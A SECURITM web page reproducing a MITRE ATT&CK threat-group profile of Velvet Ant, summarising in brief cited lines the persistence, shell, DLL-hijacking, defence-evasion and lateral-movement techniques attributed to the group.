Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

Velvet Ant

Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero day exploits.(Citation: Sygnia VelvetAnt 2024A)(Citation: Sygnia VelvetAnt 2024B)
ID: G1047
Associated Groups: 
Created: 14 Mar 2025
Last Modified: 04 Apr 2025

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use
Enterprise T1037 .004 Boot or Logon Initialization Scripts: RC Scripts

Velvet Ant used a modified `/etc/rc.local` file on compromised F5 BIG-IP devices to maintain persistence.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Velvet Ant used a custom tool, VELVETSTING, to parse encoded inbound commands to compromised F5 BIG-IP devices and then execute them via the Unix shell.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Velvet Ant has used a reverse SSH shell to securely communicate with victim devices.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Velvet Ant has used malicious DLLs executed via legitimate EXE files through DLL search order hijacking to launch follow-on payloads such as PlugX.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Velvet Ant attempted to disable local security tools and endpoint detection and response (EDR) software during operations.(Citation: Sygnia VelvetAnt 2024A)

.004 Impair Defenses: Disable or Modify System Firewall

Velvet Ant modified system firewall settings during PlugX installation using `netsh.exe` to open a listening, random high number port on victim devices.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

Velvet Ant used a malicious DLL, `iviewers.dll`, that mimics the legitimate "OLE/COM Object Viewer" within Windows.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1090 .001 Proxy: Internal Proxy

Velvet Ant has tunneled traffic from victims through an internal, compromised host to proxy communications to command and control nodes.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

Velvet Ant has transferred tools within victim environments using SMB.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1569 .002 System Services: Service Execution

Velvet Ant executed and installed PlugX as a Windows service.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1078 .003 Valid Accounts: Local Accounts

Velvet Ant accessed vulnerable Cisco switch devices using accounts with administrator privileges.(Citation: Sygnia VelvetAnt 2024B)

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.